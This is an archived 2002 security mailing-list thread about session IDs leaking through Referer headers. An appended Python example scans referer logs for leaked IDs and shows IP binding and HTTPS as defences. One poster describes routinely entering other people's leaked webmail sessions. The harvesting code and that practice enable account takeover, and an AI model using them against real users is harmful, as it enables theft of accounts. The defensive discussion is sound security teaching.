WebApp Sec mailing list archives
Re: Hijacking URL Encoded Session IDs using Referer Logs
From: zeno <bugtraq () cgisecurity net>
Date: Mon, 25 Nov 2002 10:50:41 -0500 (EST)
> Many (most?) application servers use URL encoded session IDs when the user has disabled cookies. Many users disable cookies as a security precaution. There should be an advisory on this so that application

A big problem is people hear the buzzwords cookie and security and think every website can steal every cookie from every site they ever visited. This isn't true unless they exploit some browser flaw. The only risk a cookie has is if it is stolen (*usually* through XSS attacks). Obviously some people will disable cookies. A *better* approach (if no cookies are used) would be to tie the session (if in the URL) to the user's IP address. This way if user B enters this URL they can't do anything (unless they share a proxy, so this isn't always safe). Always lots of factors.

> server vendors stop allowing URL encoded session IDs by default. If you can post an interesting link to a site, you can hijack the sessions of users with cookies disabled, and no one would be the wiser.

Another reason why a cookie is better to use.

> Does Hotmail or Yahoo use URL session IDs? E-mail someone a link to your site and hijack their e-mail account. In the scope of this attack, they'd have no way to tell that you stole it.

Yes, I see this maybe once a month or two for people using smaller free webmail companies. I simply enter in the referer and boom, get in their mailbox.

- zeno

> Also a good reason to use HTTPS.
>
> Bob
>
> On Monday, November 25, 2002, at 07:48 AM, zeno wrote:
>
>> Not to my knowledge. I guess the question would be why would you store the session ID in a user's URL? I suppose people who are too lazy to learn about cookies and don't mind having the ID logged on the server side. Not to mention it's *possible* that this ID can be saved by a webspider and archived. If using cookies to store these IDs you won't have to worry about this problem. (Unless there is a new super spider which logs cookies that I am unaware of in production use?)
>>
>> - zeno
>>
>>> Is there anything on CERT about the fact that URL encoded session IDs get passed to referenced sites in the HTTP referer header?
>>>
>>> Thanks,
>>> Bob
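The two sides of the thread, as an added example that is not code from the original posts or from any of the posters: first the attacker's view, a scanner that pulls URL-carried session IDs out of the referer log of the site the "interesting link" points to; then the server-side mitigation zeno proposes, a session store that binds each ID to the IP it was issued to; and finally the HTTPS point, the RFC 2616 rule under which a browser omits Referer when leaving an HTTPS page for an HTTP one. The log lines, the session-parameter names (jsessionid, PHPSESSID, sid and so on), the host names and the session table are all constructed for illustration.

```python
"""Referer-log session-ID harvesting, IP-bound sessions, and the HTTPS Referer rule.

Added example, not code from the mailing-list thread. All log lines, host
names and session IDs below are constructed sample data.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Apache/NCSA "combined" log format:
# ip - user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameter names that commonly carry a session ID in a URL (assumed list).
SESSION_PARAMS = ("jsessionid", "phpsessid", "sessionid", "session_id", "sid")


def session_ids_in_url(url):
    """Return {param: value} for every session-ID-looking parameter in url.

    Handles the ?PHPSESSID=... query form and the ;jsessionid=... path
    parameter form used by Java servlet containers (urlsplit keeps path
    parameters inside .path, so they are parsed by hand here).
    """
    found = {}
    parts = urlsplit(url)
    for segment in parts.path.split("/"):
        for path_param in segment.split(";")[1:]:
            if "=" in path_param:
                name, value = path_param.split("=", 1)
                if name.lower() in SESSION_PARAMS:
                    found[name] = value
    for name, values in parse_qs(parts.query).items():
        if name.lower() in SESSION_PARAMS and values:
            found[name] = values[0]
    return found


def leaked_sessions(log_lines):
    """Scan a referer log as the owner of the linked-to site would.

    Returns (referring host, parameter, session id, visitor ip) for every
    request whose Referer carried a session ID. The visitor IP matters for
    the IP-binding defence below: it is the IP the victim's session is bound to.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("referer") in ("", "-"):
            continue
        referer = m.group("referer")
        for name, value in session_ids_in_url(referer).items():
            hits.append((urlsplit(referer).hostname, name, value, m.group("ip")))
    return hits


class IpBoundSessions:
    """The mitigation proposed in the thread: a session ID is only honoured
    from the client IP it was issued to. As the thread notes, everyone behind
    one shared proxy presents the same IP, so this narrows the attack rather
    than closing it."""

    def __init__(self):
        self._issued_to = {}  # session id -> client ip at creation

    def create(self, session_id, client_ip):
        self._issued_to[session_id] = client_ip

    def lookup(self, session_id, client_ip):
        """True only if session_id exists and is presented from its own IP."""
        return self._issued_to.get(session_id) == client_ip


def referer_sent(referring_url, target_url):
    """Whether a client following RFC 2616 section 15.1.3 sends Referer when
    navigating from referring_url to target_url: it must not when the
    referring page was fetched over HTTPS and the target is plain HTTP.
    (Modern browsers additionally apply Referrer-Policy, which by default
    also strips path and query on cross-origin requests.)"""
    return not (urlsplit(referring_url).scheme == "https"
                and urlsplit(target_url).scheme == "http")


# Constructed referer log of the attacker's site; two visitors arrived from
# webmail sessions whose IDs were in the URL, one with no Referer, one from
# a site with no session in the URL.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Nov/2002:10:50:41 -0500] "GET /interesting.html HTTP/1.0" 200 512 '
    '"http://webmail.example/inbox;jsessionid=A1B2C3D4E5" "Mozilla/4.0"',
    '203.0.113.6 - - [25/Nov/2002:10:51:02 -0500] "GET /interesting.html HTTP/1.0" 200 512 '
    '"http://mail.example/read.php?PHPSESSID=9f8e7d6c&msg=42" "Mozilla/4.0"',
    '203.0.113.7 - - [25/Nov/2002:10:51:30 -0500] "GET /interesting.html HTTP/1.0" 200 512 '
    '"-" "Mozilla/4.0"',
    '203.0.113.8 - - [25/Nov/2002:10:52:00 -0500] "GET /interesting.html HTTP/1.0" 200 512 '
    '"http://news.example/story?id=7" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for host, name, sid, victim_ip in leaked_sessions(SAMPLE_LOG):
        print(f"{host}: {name}={sid} (victim at {victim_ip})")
    store = IpBoundSessions()
    store.create("A1B2C3D4E5", "203.0.113.5")
    print("victim's own IP accepted:", store.lookup("A1B2C3D4E5", "203.0.113.5"))
    print("attacker IP accepted:", store.lookup("A1B2C3D4E5", "198.51.100.9"))
    print("Referer sent HTTPS->HTTP:", referer_sent("https://webmail.example/inbox;jsessionid=X",
                                                   "http://attacker.example/"))
```

Run it against a real combined-format access log by replacing SAMPLE_LOG with the file's lines; anything `leaked_sessions` reports is a session your linked-from site handed you in plain text. The IP binding only helps if the application checks it on every request, not just at login.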
Current thread:
- Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 24)
- Re: Hijacking URL Encoded Session IDs using Referer Logs zeno (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Jeff Dafoe (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Jeff Dafoe (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs zeno (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs zeno (Nov 25)
- <Possible follow-ups>
- Re: Hijacking URL Encoded Session IDs using Referer Logs ONEILL David J (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Craig_Sullivan (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs UDP 53 (Dec 05)